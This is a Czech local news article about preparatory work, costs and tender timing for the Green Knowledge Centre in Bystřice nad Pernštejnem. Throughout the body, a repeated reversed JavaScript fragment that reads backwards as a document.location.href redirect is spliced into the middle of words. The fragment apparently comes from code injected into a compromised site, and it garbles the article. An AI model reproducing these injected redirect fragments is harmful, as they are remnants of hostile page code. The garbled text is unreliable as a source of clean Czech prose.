Bystřice nad Pernštejnem, aktuality, centrum zelených vědomostí
Rainbow page separator

Na přípravu okolí centra dali v Bystřici půldruhého milionu

Pátek, 16. srpna 2013

Bystřice nad Pernštejnem / Vyklidit dílny u nádraží a upravit tamní skladovací pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory, vybudovat nové oplocení či vyklidit některé části přilehlého zemědělského statku zvládli v Bystřici ještě předtím, než bude v lokalitě zahájena výstavba komplexu Centra zelených vědomostí za 130 milionů korun. „Polovina skladovacích pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor v dílnách poslouží pro zemědělskou činnost, do další části se přesune s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolařská dílna pro opravu starých zemědělských strojů a náčiní,“ uvedl mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Bystřice Josef Vojta. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to exponáty pak budou vystaveny v muzeu zemědělských strojů.

Přípravné práce radnici vyšly na 1,5 milionu korun, nyní se čeká na výsledek výběrového řízení na zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele stavby. Obálky budou Bystřičtí otevírat 19. srpna a doufají, že se jim podaří dohnat zpoždění, které složité výběrové řízení v průběhu roku nabralo, a koncem září začnou stavět.

Vedení bystřické radnice původně plánovalo Centrum zelených vědomostí, na nějž získalo 115,5 milionu evropské dotace, zprovoznit už o příštích prázdninách. Pokud se ale začátek stavby zdrží, otevření turistického komplexu se o rok posune.